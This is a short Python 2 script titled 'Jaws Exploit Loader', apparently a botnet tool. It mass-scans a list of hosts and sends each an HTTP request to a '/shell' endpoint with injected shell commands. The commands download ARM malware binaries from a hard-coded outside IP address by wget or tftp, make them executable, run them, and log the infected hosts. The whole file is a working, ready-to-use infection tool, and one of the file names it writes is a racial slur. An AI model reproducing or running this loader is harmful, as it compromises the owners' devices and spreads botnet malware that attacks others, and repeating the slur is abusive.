TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.Jaws/jaws_loader.5b7553.py

35 lines
1.3 KiB
Python

#Jaws Exploit Loader
import random, socket, time, sys, requests, re, os
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))
bin_names = ["ARM7", "ARM4"]
list = open(sys.argv[1], "r").readlines()
port = sys.argv[2]
def send_payload(target):
for names in bin_names:
print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names)
url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names)
try:
output = requests.get(url, timeout=3)
if output.status_code == int('200'):
print "[JAWS/1.0] infected %s" % (target)
file_h = open("jaws_infected.txt", "a+")
file_h.write(target + "\n")
file_h.close()
break
except:
pass
for i in open(sys.argv[1]).readlines():
try:
i = i.strip("\r\n")
t = Process(target=send_payload, args=(i,))
t.start()
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
except:
pass